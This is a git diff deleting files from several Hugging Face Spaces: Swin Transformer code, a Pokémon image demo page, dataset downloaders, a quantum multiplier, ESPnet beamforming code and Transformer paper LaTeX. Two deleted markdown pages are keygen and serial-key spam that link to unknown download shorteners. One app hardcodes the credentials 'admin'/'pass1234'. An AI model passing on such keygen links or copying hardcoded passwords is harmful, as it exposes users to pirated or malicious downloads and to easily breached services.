heads. - feedforward_channels (int): The hidden dimension for FFNs. - depth (int): The number of blocks in this stage. - window_size (int, optional): The local window scale. Default: 7. - qkv_bias (bool, optional): enable bias for qkv if True. Default: True. - qk_scale (float | None, optional): Override default qk scale of - head_dim ** -0.5 if set. Default: None. - drop_rate (float, optional): Dropout rate. Default: 0. - attn_drop_rate (float, optional): Attention dropout rate. Default: 0. - drop_path_rate (float | list[float], optional): Stochastic depth - rate. Default: 0. - downsample (BaseModule | None, optional): The downsample operation - module. Default: None. - act_cfg (dict, optional): The config dict of activation function. - Default: dict(type='GELU'). - norm_cfg (dict, optional): The config dict of normalization. - Default: dict(type='LN'). - with_cp (bool, optional): Use checkpoint or not. Using checkpoint - will save some memory while slowing down the training speed. - Default: False. - init_cfg (dict | list | None, optional): The init config. - Default: None. - """ - - def __init__(self, - embed_dims, - num_heads, - feedforward_channels, - depth, - window_size=7, - qkv_bias=True, - qk_scale=None, - drop_rate=0., - attn_drop_rate=0., - drop_path_rate=0., - downsample=None, - act_cfg=dict(type='GELU'), - norm_cfg=dict(type='LN'), - with_cp=False, - init_cfg=None): - super().__init__(init_cfg=init_cfg) - - if isinstance(drop_path_rate, list): - drop_path_rates = drop_path_rate - assert len(drop_path_rates) == depth - else: - drop_path_rates = [deepcopy(drop_path_rate) for _ in range(depth)] - - self.blocks = ModuleList() - for i in range(depth): - block = SwinBlock( - embed_dims=embed_dims, - num_heads=num_heads, - feedforward_channels=feedforward_channels, - window_size=window_size, - shift=False if i % 2 == 0 else True, - qkv_bias=qkv_bias, - qk_scale=qk_scale, - drop_rate=drop_rate, - attn_drop_rate=attn_drop_rate, - drop_path_rate=drop_path_rates[i], - act_cfg=act_cfg, - norm_cfg=norm_cfg, - with_cp=with_cp, - init_cfg=None) - self.blocks.append(block) - - self.downsample = downsample - - def forward(self, x, hw_shape): - for block in self.blocks: - x = block(x, hw_shape) - - if self.downsample: - x_down, down_hw_shape = self.downsample(x, hw_shape) - return x_down, down_hw_shape, x, hw_shape - else: - return x, hw_shape, x, hw_shape - - -@BACKBONES.register_module() -class SwinTransformer(BaseModule): - """ Swin Transformer - A PyTorch implement of : `Swin Transformer: - Hierarchical Vision Transformer using Shifted Windows` - - https://arxiv.org/abs/2103.14030 - - Inspiration from - https://github.com/microsoft/Swin-Transformer - - Args: - pretrain_img_size (int | tuple[int]): The size of input image when - pretrain. Defaults: 224. - in_channels (int): The num of input channels. - Defaults: 3. - embed_dims (int): The feature dimension. Default: 96. - patch_size (int | tuple[int]): Patch size. Default: 4. - window_size (int): Window size. Default: 7. - mlp_ratio (int | float): Ratio of mlp hidden dim to embedding dim. - Default: 4. - depths (tuple[int]): Depths of each Swin Transformer stage. - Default: (2, 2, 6, 2). - num_heads (tuple[int]): Parallel attention heads of each Swin - Transformer stage. Default: (3, 6, 12, 24). - strides (tuple[int]): The patch merging or patch embedding stride of - each Swin Transformer stage. (In swin, we set kernel size equal to - stride.) Default: (4, 2, 2, 2). - out_indices (tuple[int]): Output from which stages. - Default: (0, 1, 2, 3). - qkv_bias (bool, optional): If True, add a learnable bias to query, key, - value. Default: True - qk_scale (float | None, optional): Override default qk scale of - head_dim ** -0.5 if set. Default: None. - patch_norm (bool): If add a norm layer for patch embed and patch - merging. Default: True. - drop_rate (float): Dropout rate. Defaults: 0. - attn_drop_rate (float): Attention dropout rate. Default: 0. - drop_path_rate (float): Stochastic depth rate. Defaults: 0.1. - use_abs_pos_embed (bool): If True, add absolute position embedding to - the patch embedding. Defaults: False. - act_cfg (dict): Config dict for activation layer. - Default: dict(type='GELU'). - norm_cfg (dict): Config dict for normalization layer at - output of backone. Defaults: dict(type='LN'). - with_cp (bool, optional): Use checkpoint or not. Using checkpoint - will save some memory while slowing down the training speed. - Default: False. - pretrained (str, optional): model pretrained path. Default: None. - convert_weights (bool): The flag indicates whether the - pre-trained model is from the original repo. We may need - to convert some keys to make it compatible. - Default: False. - frozen_stages (int): Stages to be frozen (stop grad and set eval mode). - Default: -1 (-1 means not freezing any parameters). - init_cfg (dict, optional): The Config for initialization. - Defaults to None. - """ - - def __init__(self, - pretrain_img_size=224, - in_channels=3, - embed_dims=96, - patch_size=4, - window_size=7, - mlp_ratio=4, - depths=(2, 2, 6, 2), - num_heads=(3, 6, 12, 24), - strides=(4, 2, 2, 2), - out_indices=(0, 1, 2, 3), - qkv_bias=True, - qk_scale=None, - patch_norm=True, - drop_rate=0., - attn_drop_rate=0., - drop_path_rate=0.1, - use_abs_pos_embed=False, - act_cfg=dict(type='GELU'), - norm_cfg=dict(type='LN'), - with_cp=False, - pretrained=None, - convert_weights=False, - frozen_stages=-1, - init_cfg=None): - self.convert_weights = convert_weights - self.frozen_stages = frozen_stages - if isinstance(pretrain_img_size, int): - pretrain_img_size = to_2tuple(pretrain_img_size) - elif isinstance(pretrain_img_size, tuple): - if len(pretrain_img_size) == 1: - pretrain_img_size = to_2tuple(pretrain_img_size[0]) - assert len(pretrain_img_size) == 2, \ - f'The size of image should have length 1 or 2, ' \ - f'but got {len(pretrain_img_size)}' - - assert not (init_cfg and pretrained), \ - 'init_cfg and pretrained cannot be specified at the same time' - if isinstance(pretrained, str): - warnings.warn('DeprecationWarning: pretrained is deprecated, ' - 'please use "init_cfg" instead') - self.init_cfg = dict(type='Pretrained', checkpoint=pretrained) - elif pretrained is None: - self.init_cfg = init_cfg - else: - raise TypeError('pretrained must be a str or None') - - super(SwinTransformer, self).__init__(init_cfg=init_cfg) - - num_layers = len(depths) - self.out_indices = out_indices - self.use_abs_pos_embed = use_abs_pos_embed - - assert strides[0] == patch_size, 'Use non-overlapping patch embed.' - - self.patch_embed = PatchEmbed( - in_channels=in_channels, - embed_dims=embed_dims, - conv_type='Conv2d', - kernel_size=patch_size, - stride=strides[0], - norm_cfg=norm_cfg if patch_norm else None, - init_cfg=None) - - if self.use_abs_pos_embed: - patch_row = pretrain_img_size[0] // patch_size - patch_col = pretrain_img_size[1] // patch_size - self.absolute_pos_embed = nn.Parameter( - torch.zeros((1, embed_dims, patch_row, patch_col))) - - self.drop_after_pos = nn.Dropout(p=drop_rate) - - # set stochastic depth decay rule - total_depth = sum(depths) - dpr = [ - x.item() for x in torch.linspace(0, drop_path_rate, total_depth) - ] - - self.stages = ModuleList() - in_channels = embed_dims - for i in range(num_layers): - if i < num_layers - 1: - downsample = PatchMerging( - in_channels=in_channels, - out_channels=2 * in_channels, - stride=strides[i + 1], - norm_cfg=norm_cfg if patch_norm else None, - init_cfg=None) - else: - downsample = None - - stage = SwinBlockSequence( - embed_dims=in_channels, - num_heads=num_heads[i], - feedforward_channels=int(mlp_ratio * in_channels), - depth=depths[i], - window_size=window_size, - qkv_bias=qkv_bias, - qk_scale=qk_scale, - drop_rate=drop_rate, - attn_drop_rate=attn_drop_rate, - drop_path_rate=dpr[sum(depths[:i]):sum(depths[:i + 1])], - downsample=downsample, - act_cfg=act_cfg, - norm_cfg=norm_cfg, - with_cp=with_cp, - init_cfg=None) - self.stages.append(stage) - if downsample: - in_channels = downsample.out_channels - - self.num_features = [int(embed_dims * 2**i) for i in range(num_layers)] - # Add a norm layer for each output - for i in out_indices: - layer = build_norm_layer(norm_cfg, self.num_features[i])[1] - layer_name = f'norm{i}' - self.add_module(layer_name, layer) - - def train(self, mode=True): - """Convert the model into training mode while keep layers freezed.""" - super(SwinTransformer, self).train(mode) - self._freeze_stages() - - def _freeze_stages(self): - if self.frozen_stages >= 0: - self.patch_embed.eval() - for param in self.patch_embed.parameters(): - param.requires_grad = False - if self.use_abs_pos_embed: - self.absolute_pos_embed.requires_grad = False - self.drop_after_pos.eval() - - for i in range(1, self.frozen_stages + 1): - - if (i - 1) in self.out_indices: - norm_layer = getattr(self, f'norm{i-1}') - norm_layer.eval() - for param in norm_layer.parameters(): - param.requires_grad = False - - m = self.stages[i - 1] - m.eval() - for param in m.parameters(): - param.requires_grad = False - - def init_weights(self): - logger = get_root_logger() - if self.init_cfg is None: - logger.warn(f'No pre-trained weights for ' - f'{self.__class__.__name__}, ' - f'training start from scratch') - if self.use_abs_pos_embed: - trunc_normal_(self.absolute_pos_embed, std=0.02) - for m in self.modules(): - if isinstance(m, nn.Linear): - trunc_normal_init(m, std=.02, bias=0.) - elif isinstance(m, nn.LayerNorm): - constant_init(m, 1.0) - else: - assert 'checkpoint' in self.init_cfg, f'Only support ' \ - f'specify `Pretrained` in ' \ - f'`init_cfg` in ' \ - f'{self.__class__.__name__} ' - ckpt = _load_checkpoint( - self.init_cfg.checkpoint, logger=logger, map_location='cpu') - if 'state_dict' in ckpt: - _state_dict = ckpt['state_dict'] - elif 'model' in ckpt: - _state_dict = ckpt['model'] - else: - _state_dict = ckpt - if self.convert_weights: - # supported loading weight from original repo, - _state_dict = swin_converter(_state_dict) - - state_dict = OrderedDict() - for k, v in _state_dict.items(): - if k.startswith('backbone.'): - state_dict[k[9:]] = v - - # strip prefix of state_dict - if list(state_dict.keys())[0].startswith('module.'): - state_dict = {k[7:]: v for k, v in state_dict.items()} - - # reshape absolute position embedding - if state_dict.get('absolute_pos_embed') is not None: - absolute_pos_embed = state_dict['absolute_pos_embed'] - N1, L, C1 = absolute_pos_embed.size() - N2, C2, H, W = self.absolute_pos_embed.size() - if N1 != N2 or C1 != C2 or L != H * W: - logger.warning('Error in loading absolute_pos_embed, pass') - else: - state_dict['absolute_pos_embed'] = absolute_pos_embed.view( - N2, H, W, C2).permute(0, 3, 1, 2).contiguous() - - # interpolate position bias table if needed - relative_position_bias_table_keys = [ - k for k in state_dict.keys() - if 'relative_position_bias_table' in k - ] - for table_key in relative_position_bias_table_keys: - table_pretrained = state_dict[table_key] - table_current = self.state_dict()[table_key] - L1, nH1 = table_pretrained.size() - L2, nH2 = table_current.size() - if nH1 != nH2: - logger.warning(f'Error in loading {table_key}, pass') - elif L1 != L2: - S1 = int(L1**0.5) - S2 = int(L2**0.5) - table_pretrained_resized = F.interpolate( - table_pretrained.permute(1, 0).reshape(1, nH1, S1, S1), - size=(S2, S2), - mode='bicubic') - state_dict[table_key] = table_pretrained_resized.view( - nH2, L2).permute(1, 0).contiguous() - - # load state_dict - self.load_state_dict(state_dict, False) - - def forward(self, x): - x, hw_shape = self.patch_embed(x) - - if self.use_abs_pos_embed: - h, w = self.absolute_pos_embed.shape[1:3] - if hw_shape[0] != h or hw_shape[1] != w: - absolute_pos_embed = F.interpolate( - self.absolute_pos_embed, - size=hw_shape, - mode='bicubic', - align_corners=False).flatten(2).transpose(1, 2) - else: - absolute_pos_embed = self.absolute_pos_embed.flatten( - 2).transpose(1, 2) - x = x + absolute_pos_embed - x = self.drop_after_pos(x) - - outs = [] - for i, stage in enumerate(self.stages): - x, hw_shape, out, out_hw_shape = stage(x, hw_shape) - if i in self.out_indices: - norm_layer = getattr(self, f'norm{i}') - out = norm_layer(out) - out = out.view(-1, *out_hw_shape, - self.num_features[i]).permute(0, 3, 1, - 2).contiguous() - outs.append(out) - - return outs diff --git a/spaces/ronvolutional/ai-pokemon-card/static/index.html b/spaces/ronvolutional/ai-pokemon-card/static/index.html deleted file mode 100644 index fc630011e4b2a1979a176b3f4fe8ba51050d5061..0000000000000000000000000000000000000000 --- a/spaces/ronvolutional/ai-pokemon-card/static/index.html +++ /dev/null @@ -1,84 +0,0 @@ - - - - - - This Pokémon Does Not Exist - - - - - - - - - -
      -
      -
      - AI generated creature - AI generated creature - AI generated creature -
      -

      This Pokémon
      Does Not Exist

      - -
      - - -
      -
      -

      - Each illustration is generated with AI using a ruDALL-E - model fine-tuned by Max Woolf. Over - 100,000 such models are hosted on Hugging Face for immediate use. -

      -

      Abilities and descriptions via Pokémon TCG Developers. Not affiliated with The Pokémon Company.

      -
      -
      -
      - -
      -
      -
      -
      -
      -
      -
      -
      - The words 'Hugging Face' in the style of the Pokémon logo - -
      -
      -
      -
      -
      -
      -
      -
      -
      -
      -
      -
      -
      -
      -
      -
      -
      -
      - - - diff --git a/spaces/rorallitri/biomedical-language-models/logs/Advanced Systemcare 9 Beta Serial Key Why You Should Try This Amazing Software Today.md b/spaces/rorallitri/biomedical-language-models/logs/Advanced Systemcare 9 Beta Serial Key Why You Should Try This Amazing Software Today.md deleted file mode 100644 index 5d1843308d43988e8b9c22229e4592857ce98431..0000000000000000000000000000000000000000 --- a/spaces/rorallitri/biomedical-language-models/logs/Advanced Systemcare 9 Beta Serial Key Why You Should Try This Amazing Software Today.md +++ /dev/null @@ -1,6 +0,0 @@ -

      Advanced Systemcare 9 Beta Serial Key


      Download Ziphttps://tinurll.com/2uzowS



      -
      - aaccfb2cb3
      -
      -
      -

      diff --git a/spaces/rzimmerdev/lenet_mnist/src/downloader.py b/spaces/rzimmerdev/lenet_mnist/src/downloader.py deleted file mode 100644 index 6a48da9c1a4c01c4fdc647a2aa538cd2c682e9f7..0000000000000000000000000000000000000000 --- a/spaces/rzimmerdev/lenet_mnist/src/downloader.py +++ /dev/null @@ -1,50 +0,0 @@ -# Script to automatically download and cache dataset -# Usage: python downloader.py -# -# To learn more about the dataset, access: -# https://www.cityscapes-dataset.com/ -import os -import pip -from urllib.request import urlretrieve - - -def download_dataset(name='cityscapes', path='downloads/downloads'): - """Select one of the available and implemented downloads to download: - name=any(['cityscapes', 'camvid', 'labelme']) - """ - if name == 'cityscapes': - download_cityscapes(path) - elif name == "mnist": - download_mnist(path) - else: - raise NotImplementedError - - -def download_mnist(path="downloads/mnist"): - remote_files = {"train_images": "http://yann.lecun.com/exdb/mnist/train-images-idx3-ubyte.gz", - "train_labels": "http://yann.lecun.com/exdb/mnist/train-labels-idx1-ubyte.gz", - "test_images": "http://yann.lecun.com/exdb/mnist/t10k-images-idx3-ubyte.gz", - "test_labels": "http://yann.lecun.com/exdb/mnist/t10k-labels-idx1-ubyte.gz"} - if not os.path.exists(path): - os.makedirs(path) - - for file in remote_files.keys(): - if os.path.exists(path + "/" + file): - continue - - urlretrieve(remote_files[file], path + "/" + file) - - -def download_cityscapes(path='downloads/cityscapes'): - if hasattr(pip, 'main'): - pip.main(['install', 'cityscapesscripts']) - else: - raise EnvironmentError("pip is not installed") - print("Which dataset do you want to download?") - os.system("csDownload -l") - ds_name = input() - while ds_name not in ['gtFine_trainvaltest', 'gtFine_trainval', 'gtFine_test', - 'leftImg8bit_trainvaltest', 'leftImg8bit_trainval', 'leftImg8bit_test']: - print("Invalid dataset name. Please try again.") - ds_name = input() - os.system(f"csDownload {ds_name} -d {path}/{ds_name}") diff --git a/spaces/samyak152002/Quantumn-Multiplication/app.py b/spaces/samyak152002/Quantumn-Multiplication/app.py deleted file mode 100644 index f852cd8eabc893c39e1920c0dbc08d0a0545d16f..0000000000000000000000000000000000000000 --- a/spaces/samyak152002/Quantumn-Multiplication/app.py +++ /dev/null @@ -1,104 +0,0 @@ -import gradio as gr -from qiskit import QuantumRegister, QuantumCircuit, ClassicalRegister -from qiskit import Aer, execute -from math import pi - -def createInputState(qc, reg, n, pie): - """ - Computes the quantum Fourier transform of reg, one qubit at - a time. - Apply one Hadamard gate to the nth qubit of the quantum register reg, and - then apply repeated phase rotations with parameters being pi divided by - increasing powers of two. - """ - qc.h(reg[n]) - for i in range(0, n): - qc.cp(pie / float(2**(i + 1)), reg[n - (i + 1)], reg[n]) - -def evolveQFTState(qc, reg_a, reg_b, n, pie, factor): - """ - Evolves the state |F(ψ(reg_a))> to |F(ψ(reg_a+reg_b))> using the quantum - Fourier transform conditioned on the qubits of the reg_b. - Apply repeated phase rotations with parameters being pi divided by - increasing powers of two. - """ - l = len(reg_b) - for i in range(0, n + 1): - if (n - i) > l - 1: - pass - else: - qc.cp(factor*pie / float(2**(i)), reg_b[n - i], reg_a[n]) - -def inverseQFT(qc, reg, n, pie): - """ - Performs the inverse quantum Fourier transform on a register reg. - Apply repeated phase rotations with parameters being pi divided by - decreasing powers of two, and then apply a Hadamard gate to the nth qubit - of the register reg. - """ - for i in range(0, n): - qc.cp(-1 * pie / float(2**(n - i)), reg[i], reg[n]) - qc.h(reg[n]) - -def add(reg_a, reg_b, circ, factor): - """ - Add two quantum registers reg_a and reg_b, and store the result in - reg_a. - """ - pie = pi - n = len(reg_a) - 1 - - # Compute the Fourier transform of register a - for i in range(0, n + 1): - createInputState(circ, reg_a, n - i, pie) - # Add the two numbers by evolving the Fourier transform F(ψ(reg_a))> - # to |F(ψ(reg_a+reg_b))> - for i in range(0, n + 1): - evolveQFTState(circ, reg_a, reg_b, n - i, pie, factor) - # Compute the inverse Fourier transform of register a - for i in range(0, n + 1): - inverseQFT(circ, reg_a, i, pie) - -def quantum_multiply(multiplicand_in, multiplier_in): - multiplicand_in = multiplicand_in.strip() - multiplier_in = multiplier_in.strip() - - multiplicand = QuantumRegister(len(multiplicand_in)) - multiplier = QuantumRegister(len(multiplier_in)) - accumulator = QuantumRegister(len(multiplicand_in) + len(multiplier_in)) - cl = ClassicalRegister(len(multiplicand_in) + len(multiplier_in)) - d = QuantumRegister(1) - - circ = QuantumCircuit(accumulator, multiplier, multiplicand, - d, cl, name="qc") - - # Store bit strings in quantum registers - for i in range(len(multiplicand_in)): - if multiplicand_in[i] == '1': - circ.x(multiplicand[len(multiplicand_in) - i - 1]) - - for i in range(len(multiplier_in)): - if multiplier_in[i] == '1': - circ.x(multiplier[len(multiplicand_in) - i - 1]) - - multiplier_str = '1' - # Perform repeated addition until the multiplier - # is zero - while(int(multiplier_str) != 0): - add(accumulator, multiplicand, circ, 1) - add(multiplier, d, circ, -1) - for i in range(len(multiplier)): - circ.measure(multiplier[i], cl[i]) - result = execute(circ, backend=Aer.get_backend('qasm_simulator'), - shots=2).result().get_counts(circ.name) - multiplier_str = list(result.keys())[0] - - circ.measure(accumulator, cl) - result = execute(circ, backend=Aer.get_backend('qasm_simulator'), - shots=2).result().get_counts(circ.name) - - return list(result.keys())[0] - -iface = gr.Interface(quantum_multiply, inputs=["text", "text"], outputs="text") - -iface.launch() diff --git a/spaces/sasha/Draw-Me-An-Insect/README.md b/spaces/sasha/Draw-Me-An-Insect/README.md deleted file mode 100644 index e3baac89f780d45a6e9f3484b53809437e27c3be..0000000000000000000000000000000000000000 --- a/spaces/sasha/Draw-Me-An-Insect/README.md +++ /dev/null @@ -1,13 +0,0 @@ ---- -title: Draw Me an Insect -emoji: 🐞🖼 -colorFrom: red -colorTo: pink -sdk: gradio -sdk_version: 3.9.1 -app_file: app.py -pinned: false -duplicated_from: fffiloni/whisper-to-stable-diffusion ---- - -Check out the configuration reference at https://huggingface.co/docs/hub/spaces-config-reference diff --git a/spaces/sccstandardteam/ChuanhuChatGPT/assets/Kelpy-Codos.js b/spaces/sccstandardteam/ChuanhuChatGPT/assets/Kelpy-Codos.js deleted file mode 100644 index cfbaeedb4f371dfb5fe157db545b364046fca3e1..0000000000000000000000000000000000000000 --- a/spaces/sccstandardteam/ChuanhuChatGPT/assets/Kelpy-Codos.js +++ /dev/null @@ -1,76 +0,0 @@ -// ==UserScript== -// @name Kelpy Codos -// @namespace https://github.com/Keldos-Li/Kelpy-Codos -// @version 1.0.5 -// @author Keldos; https://keldos.me/ -// @description Add copy button to PRE tags before CODE tag, for Chuanhu ChatGPT especially. -// Based on Chuanhu ChatGPT version: ac04408 (2023-3-22) -// @license GPL-3.0 -// @grant none -// ==/UserScript== - -(function () { - 'use strict'; - - function addCopyButton(pre) { - var code = pre.querySelector('code'); - if (!code) { - return; // 如果没有找到 元素,则不添加按钮 - } - var firstChild = code.firstChild; - if (!firstChild) { - return; // 如果 元素没有子节点,则不添加按钮 - } - var button = document.createElement('button'); - button.textContent = '\uD83D\uDCCE'; // 使用 📎 符号作为“复制”按钮的文本 - button.style.position = 'relative'; - button.style.float = 'right'; - button.style.fontSize = '1em'; // 可选:调整按钮大小 - button.style.background = 'none'; // 可选:去掉背景颜色 - button.style.border = 'none'; // 可选:去掉边框 - button.style.cursor = 'pointer'; // 可选:显示指针样式 - button.addEventListener('click', function () { - var range = document.createRange(); - range.selectNodeContents(code); - range.setStartBefore(firstChild); // 将范围设置为第一个子节点之前 - var selection = window.getSelection(); - selection.removeAllRanges(); - selection.addRange(range); - - try { - var success = document.execCommand('copy'); - if (success) { - button.textContent = '\u2714'; - setTimeout(function () { - button.textContent = '\uD83D\uDCCE'; // 恢复按钮为“复制” - }, 2000); - } else { - button.textContent = '\u2716'; - } - } catch (e) { - console.error(e); - button.textContent = '\u2716'; - } - - selection.removeAllRanges(); - }); - code.insertBefore(button, firstChild); // 将按钮插入到第一个子元素之前 - } - - function handleNewElements(mutationsList, observer) { - for (var mutation of mutationsList) { - if (mutation.type === 'childList') { - for (var node of mutation.addedNodes) { - if (node.nodeName === 'PRE') { - addCopyButton(node); - } - } - } - } - } - - var observer = new MutationObserver(handleNewElements); - observer.observe(document.documentElement, { childList: true, subtree: true }); - - document.querySelectorAll('pre').forEach(addCopyButton); -})(); diff --git a/spaces/scedlatioru/img-to-music/example/CounterPath EyeBeam Enhanced 1.5.19.4.51814 [VERIFIED].md b/spaces/scedlatioru/img-to-music/example/CounterPath EyeBeam Enhanced 1.5.19.4.51814 [VERIFIED].md deleted file mode 100644 index ba5755364cc152da0d6d5131cf2dcaa646fac0b7..0000000000000000000000000000000000000000 --- a/spaces/scedlatioru/img-to-music/example/CounterPath EyeBeam Enhanced 1.5.19.4.51814 [VERIFIED].md +++ /dev/null @@ -1,6 +0,0 @@ -

      CounterPath eyeBeam Enhanced 1.5.19.4.51814


      Download Ziphttps://gohhs.com/2uEAmz



      - -CounterPath eyeBeam Enhanced v1.5.19.2.49847 keygen by Z.W.T Co.. CounterPath eyeBeam Enhanced 1.5.19.4.51814 . 4d29de3e1b
      -
      -
      -

      diff --git a/spaces/segments-tobias/conex/espnet/nets/chainer_backend/nets_utils.py b/spaces/segments-tobias/conex/espnet/nets/chainer_backend/nets_utils.py deleted file mode 100644 index 5e4919abb49f2985192149452ed59663b4caf8bf..0000000000000000000000000000000000000000 --- a/spaces/segments-tobias/conex/espnet/nets/chainer_backend/nets_utils.py +++ /dev/null @@ -1,7 +0,0 @@ -import chainer.functions as F - - -def _subsamplex(x, n): - x = [F.get_item(xx, (slice(None, None, n), slice(None))) for xx in x] - ilens = [xx.shape[0] for xx in x] - return x, ilens diff --git a/spaces/segments-tobias/conex/espnet/nets/pytorch_backend/frontends/beamformer.py b/spaces/segments-tobias/conex/espnet/nets/pytorch_backend/frontends/beamformer.py deleted file mode 100644 index f3eccee4cf98b164f8eb9802bde3741ac23dc9dc..0000000000000000000000000000000000000000 --- a/spaces/segments-tobias/conex/espnet/nets/pytorch_backend/frontends/beamformer.py +++ /dev/null @@ -1,84 +0,0 @@ -import torch -from torch_complex import functional as FC -from torch_complex.tensor import ComplexTensor - - -def get_power_spectral_density_matrix( - xs: ComplexTensor, mask: torch.Tensor, normalization=True, eps: float = 1e-15 -) -> ComplexTensor: - """Return cross-channel power spectral density (PSD) matrix - - Args: - xs (ComplexTensor): (..., F, C, T) - mask (torch.Tensor): (..., F, C, T) - normalization (bool): - eps (float): - Returns - psd (ComplexTensor): (..., F, C, C) - - """ - # outer product: (..., C_1, T) x (..., C_2, T) -> (..., T, C, C_2) - psd_Y = FC.einsum("...ct,...et->...tce", [xs, xs.conj()]) - - # Averaging mask along C: (..., C, T) -> (..., T) - mask = mask.mean(dim=-2) - - # Normalized mask along T: (..., T) - if normalization: - # If assuming the tensor is padded with zero, the summation along - # the time axis is same regardless of the padding length. - mask = mask / (mask.sum(dim=-1, keepdim=True) + eps) - - # psd: (..., T, C, C) - psd = psd_Y * mask[..., None, None] - # (..., T, C, C) -> (..., C, C) - psd = psd.sum(dim=-3) - - return psd - - -def get_mvdr_vector( - psd_s: ComplexTensor, - psd_n: ComplexTensor, - reference_vector: torch.Tensor, - eps: float = 1e-15, -) -> ComplexTensor: - """Return the MVDR(Minimum Variance Distortionless Response) vector: - - h = (Npsd^-1 @ Spsd) / (Tr(Npsd^-1 @ Spsd)) @ u - - Reference: - On optimal frequency-domain multichannel linear filtering - for noise reduction; M. Souden et al., 2010; - https://ieeexplore.ieee.org/document/5089420 - - Args: - psd_s (ComplexTensor): (..., F, C, C) - psd_n (ComplexTensor): (..., F, C, C) - reference_vector (torch.Tensor): (..., C) - eps (float): - Returns: - beamform_vector (ComplexTensor)r: (..., F, C) - """ - # Add eps - C = psd_n.size(-1) - eye = torch.eye(C, dtype=psd_n.dtype, device=psd_n.device) - shape = [1 for _ in range(psd_n.dim() - 2)] + [C, C] - eye = eye.view(*shape) - psd_n += eps * eye - - # numerator: (..., C_1, C_2) x (..., C_2, C_3) -> (..., C_1, C_3) - numerator = FC.einsum("...ec,...cd->...ed", [psd_n.inverse(), psd_s]) - # ws: (..., C, C) / (...,) -> (..., C, C) - ws = numerator / (FC.trace(numerator)[..., None, None] + eps) - # h: (..., F, C_1, C_2) x (..., C_2) -> (..., F, C_1) - beamform_vector = FC.einsum("...fec,...c->...fe", [ws, reference_vector]) - return beamform_vector - - -def apply_beamforming_vector( - beamform_vector: ComplexTensor, mix: ComplexTensor -) -> ComplexTensor: - # (..., C) x (..., C, T) -> (..., T) - es = FC.einsum("...c,...ct->...t", [beamform_vector.conj(), mix]) - return es diff --git a/spaces/serhatderya/controlnet_v11_scribble_ui/app.py b/spaces/serhatderya/controlnet_v11_scribble_ui/app.py deleted file mode 100644 index 929948d72514cf929dc25e7ab41f0c014b0ef17d..0000000000000000000000000000000000000000 --- a/spaces/serhatderya/controlnet_v11_scribble_ui/app.py +++ /dev/null @@ -1,4 +0,0 @@ -import gradio as gr - -demo = gr.load("serhatderya/konseptai_scribble", src="spaces") -demo.launch(auth=("admin", "pass1234")) \ No newline at end of file diff --git a/spaces/shencc/gpt/crazy_functions/test_project/latex/attention/model_architecture.tex b/spaces/shencc/gpt/crazy_functions/test_project/latex/attention/model_architecture.tex deleted file mode 100644 index c82be6242cc9d26203360e90d3ac9184ef6ad842..0000000000000000000000000000000000000000 --- a/spaces/shencc/gpt/crazy_functions/test_project/latex/attention/model_architecture.tex +++ /dev/null @@ -1,155 +0,0 @@ - -\begin{figure} - \centering - \includegraphics[scale=0.6]{Figures/ModalNet-21} - \caption{The Transformer - model architecture.} - \label{fig:model-arch} -\end{figure} - -% Although the primary workhorse of our model is attention, -%Our model maintains the encoder-decoder structure that is common to many so-called sequence-to-sequence models \citep{bahdanau2014neural,sutskever14}. As in all such architectures, the encoder computes a representation of the input sequence, and the decoder consumes these representations along with the output tokens to autoregressively produce the output sequence. Where, traditionally, the encoder and decoder contain stacks of recurrent or convolutional layers, our encoder and decoder stacks are composed of attention layers and position-wise feed-forward layers (Figure~\ref{fig:model-arch}). The following sections describe the gross architecture and these particular components in detail. - -Most competitive neural sequence transduction models have an encoder-decoder structure \citep{cho2014learning,bahdanau2014neural,sutskever14}. Here, the encoder maps an input sequence of symbol representations $(x_1, ..., x_n)$ to a sequence of continuous representations $\mathbf{z} = (z_1, ..., z_n)$. Given $\mathbf{z}$, the decoder then generates an output sequence $(y_1,...,y_m)$ of symbols one element at a time. At each step the model is auto-regressive \citep{graves2013generating}, consuming the previously generated symbols as additional input when generating the next. - -The Transformer follows this overall architecture using stacked self-attention and point-wise, fully connected layers for both the encoder and decoder, shown in the left and right halves of Figure~\ref{fig:model-arch}, respectively. - -\subsection{Encoder and Decoder Stacks} - -\paragraph{Encoder:}The encoder is composed of a stack of $N=6$ identical layers. Each layer has two sub-layers. The first is a multi-head self-attention mechanism, and the second is a simple, position-wise fully connected feed-forward network. We employ a residual connection \citep{he2016deep} around each of the two sub-layers, followed by layer normalization \cite{layernorm2016}. That is, the output of each sub-layer is $\mathrm{LayerNorm}(x + \mathrm{Sublayer}(x))$, where $\mathrm{Sublayer}(x)$ is the function implemented by the sub-layer itself. To facilitate these residual connections, all sub-layers in the model, as well as the embedding layers, produce outputs of dimension $\dmodel=512$. - -\paragraph{Decoder:}The decoder is also composed of a stack of $N=6$ identical layers. In addition to the two sub-layers in each encoder layer, the decoder inserts a third sub-layer, which performs multi-head attention over the output of the encoder stack. Similar to the encoder, we employ residual connections around each of the sub-layers, followed by layer normalization. We also modify the self-attention sub-layer in the decoder stack to prevent positions from attending to subsequent positions. This masking, combined with fact that the output embeddings are offset by one position, ensures that the predictions for position $i$ can depend only on the known outputs at positions less than $i$. - -% In our model (Figure~\ref{fig:model-arch}), the encoder and decoder are composed of stacks of alternating self-attention layers (for cross-positional communication) and position-wise feed-forward layers (for in-place computation). In addition, the decoder stack contains encoder-decoder attention layers. Since attention is agnostic to the distances between words, our model requires a "positional encoding" to be added to the encoder and decoder input. The following sections describe all of these components in detail. - -\subsection{Attention} \label{sec:attention} -An attention function can be described as mapping a query and a set of key-value pairs to an output, where the query, keys, values, and output are all vectors. The output is computed as a weighted sum of the values, where the weight assigned to each value is computed by a compatibility function of the query with the corresponding key. - -\subsubsection{Scaled Dot-Product Attention} \label{sec:scaled-dot-prod} - -% \begin{figure} -% \centering -% \includegraphics[scale=0.6]{Figures/ModalNet-19} -% \caption{Scaled Dot-Product Attention.} -% \label{fig:multi-head-att} -% \end{figure} - -We call our particular attention "Scaled Dot-Product Attention" (Figure~\ref{fig:multi-head-att}). The input consists of queries and keys of dimension $d_k$, and values of dimension $d_v$. We compute the dot products of the query with all keys, divide each by $\sqrt{d_k}$, and apply a softmax function to obtain the weights on the values. - -In practice, we compute the attention function on a set of queries simultaneously, packed together into a matrix $Q$. The keys and values are also packed together into matrices $K$ and $V$. We compute the matrix of outputs as: - -\begin{equation} - \mathrm{Attention}(Q, K, V) = \mathrm{softmax}(\frac{QK^T}{\sqrt{d_k}})V -\end{equation} - -The two most commonly used attention functions are additive attention \citep{bahdanau2014neural}, and dot-product (multiplicative) attention. Dot-product attention is identical to our algorithm, except for the scaling factor of 